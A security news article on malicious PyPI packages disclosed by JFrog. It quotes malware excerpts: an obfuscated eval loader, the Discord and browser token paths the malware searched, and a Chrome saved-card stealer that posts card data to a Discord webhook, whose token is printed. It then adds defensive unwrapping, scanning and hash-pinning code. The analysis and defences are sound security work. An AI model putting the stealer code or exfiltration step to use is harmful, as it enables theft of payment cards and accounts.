Python Official Repository Found to Be Housing Credit-Card Stealing Malware

Many attribute it to negligence by PyPI's moderators.

TL;DR

On July 29, 2021, security researchers at JFrog disclosed malicious packages hosted on PyPI, Python's official package index. The packages carried credit-card-stealing malware.

Key Facts
  1. Eight different packages were identified as malicious.

  2. The packages were downloaded more than 30,000 times from PyPI before they were removed.

  3. The malicious packages also stole Discord authentication tokens, which can be used to impersonate the victim.

Details

The rate at which PyPI and other public repositories are hit by supply chain attacks that proper security could have fended off is alarming. RubyGems, PyPI and npm have one thing in common: each has had its repository polluted with malicious packages aimed at unsuspecting developers. Supply chain attacks, big and small, keep landing on these hubs, where the packages sit waiting for trusting developers to install them.

In this case, eight different packages from three maintainers were found on PyPI. They were taken down immediately after JFrog notified PyPI, but by then they had been downloaded over 30,000 times, according to data from pepy.tech. Research into the actual impact of the attack is still ongoing.

According to JFrog, stealing credit card details was not the only thing the packages did: they also harvested Discord authentication tokens, which would let the actors impersonate the victim on the Discord messaging platform.

This looks like a smaller event than the dependency confusion attacks Sonatype reported in early March. That campaign was bigger in its targets (Amazon, Microsoft, Zillow, Lyft), its scale and its impact. What that incident, which saw Microsoft pay the researchers who had attacked its own systems, shares with this one is Python and its all-too-permissive repository, PyPI. Past studies have found that almost half of the packages on PyPI contain at least one security weakness. Public repository maintainers have to step up the vetting of uploaded packages. A zero-trust approach might be seen as going too far, but malicious actors currently have their job too easy: they distribute malware and launch successful attacks on developers and CI/CD pipelines with little effort.

"The continued discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks. The ability for attackers to use simple obfuscation techniques to introduce malware means developers have to be concerned and vigilant."

Asaf Karas, CTO Security at JFrog

The lack of moderation and automated security safeguards in PyPI and other public software repositories, according to the researchers, makes it relatively easy for threat actors to inject harmful code.

The obfuscation the packages used was simple: a few layers of base64 and rot13, with identifiers and calls hidden as hex-escaped strings and resolved through eval(). That may slow down a casual reviewer, but JFrog's automated tooling unwrapped it without difficulty.

Below is an abridged version of the noblesse2 main module (the long string constants are truncated):

import base64, codecs
# Four string fragments hold the base64-encoded second stage; two of them are additionally rot13-encoded.
# The first fragment alone already decodes to "import colorama, datetime".
magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...'
love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...'
god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...'
destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...'
# '\x72\x6f\x74\x31\x33' is just the string 'rot13' written as hex escapes.
joy = '\x72\x6f\x74\x31\x33'
# The variable names and the codecs.decode(...) call are hex-escaped too ('magic', 'codecs.d...') and resolved with eval().
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...')
# The reassembled string ('trust') is base64-decoded, compiled and executed, so the real payload never appears in plaintext.
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec'))
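As an added example (not code from the page or from the malware), here is the same layering built from a benign, constructed payload and then unwrapped statically. make_stub only exists to produce a stub of the same shape as the one above; unwrap_stub walks the stub's syntax tree and evaluates nothing but string literals, names, '+' concatenation, eval() over a literal, and codecs.decode(..., 'rot13'), so a sample can be peeled without ever running it. The full codecs.decode(love, joy) call is an assumption, modeled on the truncated eval('codecs.d...') line above.

```python
import ast
import base64
import codecs

# Constructed, benign stand-in for the second stage; the real one is not reproduced here.
INNER_PAYLOAD = "result = 'stage-2 would run here'\n"


def _hexed(s: str) -> str:
    """Write a string as \\xNN escapes, the way the stub hides 'rot13' and its variable names."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


def make_stub(payload: str) -> str:
    """Build a loader in the same shape as the noblesse one (constructed for this demo):
    base64 the payload, split it into four fragments, rot13 the second and fourth, and
    resolve every identifier through eval() on a hex-escaped string."""
    b64 = base64.b64encode(payload.encode()).decode()
    size = -(-len(b64) // 4)  # ceiling division so four fragments cover the whole string
    frag = [b64[i * size:(i + 1) * size] for i in range(4)]
    return (
        "import base64, codecs\n"
        f"magic = {frag[0]!r}\n"
        f"love = {codecs.encode(frag[1], 'rot13')!r}\n"
        f"god = {frag[2]!r}\n"
        f"destiny = {codecs.encode(frag[3], 'rot13')!r}\n"
        f"joy = '{_hexed('rot13')}'\n"
        f"trust = eval('{_hexed('magic')}') + eval('{_hexed('codecs.decode(love, joy)')}') "
        f"+ eval('{_hexed('god')}') + eval('{_hexed('codecs.decode(destiny, joy)')}')\n"
        f"eval(compile(base64.b64decode(eval('{_hexed('trust')}')), '', 'exec'))\n"
    )


class StubEvaluator:
    """Evaluates only the tiny expression language the stub needs: string literals, names,
    '+' concatenation, eval('<literal>') and codecs.decode(x, 'rot13'). Anything else is
    refused instead of executed, so a sample is unwrapped without running it."""

    def __init__(self):
        self.names = {}

    def value(self, node: ast.AST) -> str:
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            return node.value
        if isinstance(node, ast.Name):
            return self.names[node.id]
        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            return self.value(node.left) + self.value(node.right)
        if isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name) and fn.id == "eval" and len(node.args) == 1:
                # eval('<expr>'): parse the literal and evaluate it under the same rules
                inner = ast.parse(self.value(node.args[0]), mode="eval").body
                return self.value(inner)
            if (isinstance(fn, ast.Attribute) and isinstance(fn.value, ast.Name)
                    and fn.value.id == "codecs" and fn.attr == "decode" and len(node.args) == 2):
                data, codec = (self.value(a) for a in node.args)
                if codec != "rot13":
                    raise ValueError(f"unexpected codec {codec!r}")
                return codecs.decode(data, "rot13")
        raise ValueError(f"refusing to evaluate: {ast.dump(node)[:80]}")

    def assign(self, stmt: ast.Assign) -> None:
        if len(stmt.targets) == 1 and isinstance(stmt.targets[0], ast.Name):
            self.names[stmt.targets[0].id] = self.value(stmt.value)


def unwrap_stub(stub_src: str) -> str:
    """Return the source the stub would have handed to exec(), without executing anything."""
    ev = StubEvaluator()
    for stmt in ast.parse(stub_src).body:
        if isinstance(stmt, ast.Assign):
            ev.assign(stmt)
        elif isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            sink = stmt.value  # expected shape: eval(compile(base64.b64decode(<expr>), '', 'exec'))
            if not (isinstance(sink.func, ast.Name) and sink.func.id in ("eval", "exec")):
                continue
            comp = sink.args[0] if sink.args else None
            if not (isinstance(comp, ast.Call) and isinstance(comp.func, ast.Name)
                    and comp.func.id == "compile"):
                continue
            b64 = comp.args[0] if comp.args else None
            if (isinstance(b64, ast.Call) and isinstance(b64.func, ast.Attribute)
                    and b64.func.attr == "b64decode"):
                return base64.b64decode(ev.value(b64.args[0])).decode()
    raise ValueError("no eval(compile(base64.b64decode(...))) sink found")


def unwrap_or_none(stub_src: str):
    """None when the stub uses anything outside the safe subset (or is not a stub at all)."""
    try:
        return unwrap_stub(stub_src)
    except (ValueError, KeyError, SyntaxError):
        return None


if __name__ == "__main__":
    stub = make_stub(INNER_PAYLOAD)
    print(stub)
    print("recovered:", unwrap_stub(stub))
```

Running a stub under a hooked eval() is the usual shortcut, and the reason it is a bad idea is visible in unwrap_or_none: anything outside the expected subset (an __import__, an attribute on the result of a call) is refused rather than executed. Real samples nest several of these layers; call unwrap_stub repeatedly on its own output until the result stops matching the loader shape.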

And here is the Discord authentication-token stealer, which starts from the on-disk storage locations of the Discord clients and of Chromium-based browsers:

import os

local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')

# Directories whose local storage is searched for Discord tokens: the three Discord
# desktop builds plus the default profiles of several Chromium-based browsers.
paths = {
    'Discord': roaming + '\\Discord',
    'Discord Canary': roaming + '\\discordcanary',
    'Discord PTB': roaming + '\\discordptb',
    'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
    'Opera': roaming + '\\Opera Software\\Opera Stable',
    'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
    'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}

The stolen data was exfiltrated through a hard-coded Discord webhook, the hook object used by the stealer code. Its webhook object, in the form Discord's API returns it, looks like this:

{
  "type": 1,
  "id": "807327703082074143",
  "name": "Captain Hook",
  "avatar": null,
  "channel_id": "725001140324008047",
  "guild_id": "720931953251057725",
  "application_id": null,
  "token": "uwAgm7PQaROJB3USUNDv1RT7uJzfidUsHBsC_y0p2qtChlzNVgpG1vw2zAtkFX-8Xq-x"
}

Noblesse payload #2: stealing autocomplete data. When a user saves a payment card in Chrome's autofill settings, this is what the malware reads:

import os
import shutil
import sqlite3

# Defined elsewhere in the package and not shown in this excerpt: master() returns the key
# Chrome uses to protect stored values, dpw() decrypts one value with it, and hook is the
# Discord webhook the data is posted to.

def cs():
    master_key = master()
    # Chrome's autofill database; saved payment cards live in its credit_cards table.
    # "default" is the wrong case for the real "Default" profile folder, but Windows
    # paths are case-insensitive, so the lookup still succeeds.
    login_db = os.environ['USERPROFILE'] + os.sep + \
        r'AppData\Local\Google\Chrome\User Data\default\Web Data'
    # Copy the file first: Chrome holds a lock on the live database while it is running.
    shutil.copy2(login_db, "CCvault.db")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            # The variable names were copied from a password stealer; the columns actually
            # read are name_on_card, expiration_month, expiration_year and card_number_encrypted.
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = dpw(encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            # One card per message, straight to the hard-coded Discord webhook.
            hook.send(
                "CARD-NAME: " + username +
                "\nNUMBER: " + decrypted_password +
                "\nEXPIRY M: " + str(expire_mon) +
                "\nEXPIRY Y: " + str(expire_year) +
                "\n" + "*" * 10 + "\n"
            )
    except Exception:
        pass  # the excerpt ends here; the original handler is not shown
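The indicators in these excerpts (eval(compile(base64.b64decode(...))), hex-escaped strings fed to eval(), the rot13 codec, the Discord and browser profile paths, and the SELECT from credit_cards) are cheap to look for before a package is ever imported. The scanner below is an added example, not JFrog's tooling or any code from the malware; its sample input is constructed to resemble the excerpts above, and the regexes are assumptions about how this family writes these constructs, so expect both misses on reworded variants and hits on legitimate password managers or Discord bots.

```python
import re
from pathlib import Path

# Indicators drawn from the noblesse excerpts on this page. Each hit is (line number, label, matched text).
INDICATORS = [
    ("exec of a decoded blob",
     re.compile(r"\b(?:eval|exec)\s*\(\s*compile\s*\(\s*base64\.b64decode")),
    ("hex-escaped string handed to eval",
     re.compile(r"\beval\s*\(\s*['\"](?:\\x[0-9a-fA-F]{2}){3,}")),
    ("rot13 codec",
     re.compile(r"rot_?13|\\x72\\x6f\\x74\\x31\\x33")),          # plain or hex-escaped 'rot13'
    ("Discord client storage path",
     re.compile(r"\\+(?:discordcanary|discordptb|discord)['\"]", re.I)),
    ("Chromium profile path",
     re.compile(r"User Data\\+Default", re.I)),
    ("Chrome saved-card table",
     re.compile(r"\bFROM\s+credit_cards\b", re.I)),
    ("Discord webhook URL",
     re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I)),
]


def scan(source: str) -> list:
    """Return every indicator hit in a piece of Python source, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, rx in INDICATORS:
            for m in rx.finditer(line):
                findings.append((lineno, label, m.group(0)))
    return findings


def labels(source: str) -> set:
    """Just the set of indicator labels that fired; handy for a quick triage verdict."""
    return {label for _, label, _ in scan(source)}


def scan_package(root: Path) -> dict:
    """Scan every .py file in an unpacked sdist or wheel. setup.py matters most, since
    `pip install` runs it. Returns {relative path: findings} for files with at least one hit."""
    report = {}
    for py in sorted(root.rglob("*.py")):
        hits = scan(py.read_text(errors="replace"))
        if hits:
            report[str(py.relative_to(root))] = hits
    return report


# Constructed sample in the shape of the excerpts above (raw string, so the escapes stay literal).
SAMPLE = r'''
import base64, codecs, os
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec'))
roaming = os.getenv('APPDATA')
paths = {'Discord': roaming + '\\Discord', 'Discord PTB': roaming + '\\discordptb'}
cursor.execute("SELECT * FROM credit_cards")
'''

# Constructed benign module for comparison.
BENIGN = "import json\n\ndef load(path):\n    with open(path) as f:\n        return json.load(f)\n"

if __name__ == "__main__":
    for lineno, label, text in scan(SAMPLE):
        print(f"line {lineno}: {label}: {text}")
    print("benign hits:", scan(BENIGN))
```

Two hits from different groups (an execution sink plus either an obfuscation marker or a credential path) is a reasonable bar for pulling a package aside for manual review; a single hit on its own is mostly noise.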

JFrog advises developers to tread carefully when installing from public repositories, to verify library signatures or pinned hashes in their CI/CD pipelines, and, where needed, to adopt tools that flag malicious code.
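Package signatures on PyPI are rarely published or checked, so the practical equivalent in a pipeline is pinning every dependency to an exact version and sha256 digest and refusing anything else, which pip enforces with --require-hashes. As an added example (not pip's code or JFrog's), the block below implements that check for artifacts fetched outside pip, for instance a vendored-wheel gate in CI: it parses a hash-pinned requirements file in the layout pip-compile --generate-hashes produces and verifies a wheel or sdist against it. The wheel, lockfile and package name in demo() are constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# One logical requirement line as `pip hash` / `pip-compile --generate-hashes` write it:
#   name==version --hash=sha256:<hex> [--hash=sha256:<hex> ...]
REQ_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>\S+)"
    r"(?P<hashes>(?:\s+--hash=sha256:[0-9a-f]{64})*)\s*$"
)
HASH = re.compile(r"--hash=sha256:([0-9a-f]{64})")


def _logical_lines(text: str):
    """Join backslash-continued lines and drop comments, as pip's requirements parser does."""
    buf = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            yield buf.strip()
        buf = ""


def _canonical(name: str) -> str:
    """PEP 503 normalisation so 'Example_Pkg' and 'example-pkg' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text: str) -> dict:
    """Map canonical project name -> (version, {sha256 digests}); every entry must carry a hash."""
    pins = {}
    for line in _logical_lines(text):
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"not an exact, hash-pinned requirement: {line!r}")
        digests = set(HASH.findall(m["hashes"]))
        if not digests:
            # pip --require-hashes refuses the whole install in this case; so do we.
            raise ValueError(f"{m['name']} is pinned by version only; a --hash is required")
        pins[_canonical(m["name"])] = (m["version"], digests)
    return pins


def project_from_filename(filename: str) -> tuple:
    """Recover (canonical name, version) from a wheel or sdist file name."""
    if filename.endswith(".whl"):
        dist, version = filename[:-4].split("-")[:2]
    elif filename.endswith(".tar.gz"):
        dist, version = filename[:-7].rsplit("-", 1)
    else:
        raise ValueError(f"unsupported artifact: {filename!r}")
    return _canonical(dist), version


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifact(path: Path, pins: dict) -> bool:
    """True only if the file is for a pinned project, at the pinned version, with a pinned digest."""
    name, version = project_from_filename(path.name)
    if name not in pins:
        raise ValueError(f"{name} is not in the lockfile; refusing an unpinned package")
    pinned_version, digests = pins[name]
    return version == pinned_version and sha256_of(path) in digests


def demo() -> dict:
    """Constructed end-to-end run: a fake wheel, a lockfile pinning its digest, then a tampered copy."""
    with tempfile.TemporaryDirectory() as tmp:
        wheel = Path(tmp) / "example_pkg-1.0.0-py3-none-any.whl"
        wheel.write_bytes(b"PK\x03\x04 constructed wheel bytes, not a real archive\n")
        lock = (
            "# constructed lockfile in pip-compile --generate-hashes layout\n"
            "example-pkg==1.0.0 \\\n"
            f"    --hash=sha256:{sha256_of(wheel)}\n"
        )
        pins = parse_requirements(lock)
        clean = verify_artifact(wheel, pins)
        # A different build re-uploaded under the same name and version changes the digest.
        wheel.write_bytes(wheel.read_bytes() + b"# extra bytes\n")
        tampered = verify_artifact(wheel, pins)
        try:
            parse_requirements("example-pkg==1.0.0\n")
            unpinned_rejected = False
        except ValueError:
            unpinned_rejected = True
    return {"clean": clean, "tampered": tampered, "unpinned_rejected": unpinned_rejected}


if __name__ == "__main__":
    print(demo())
```

A freshly uploaded malicious version of a dependency, or a dependency-confusion upload under a name the lockfile does not know, fails this check: the version or digest differs, or the project is absent and verify_artifact raises. The check is only as good as the lockfile, so generate it from a clean environment and review changes to it the way you review code.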

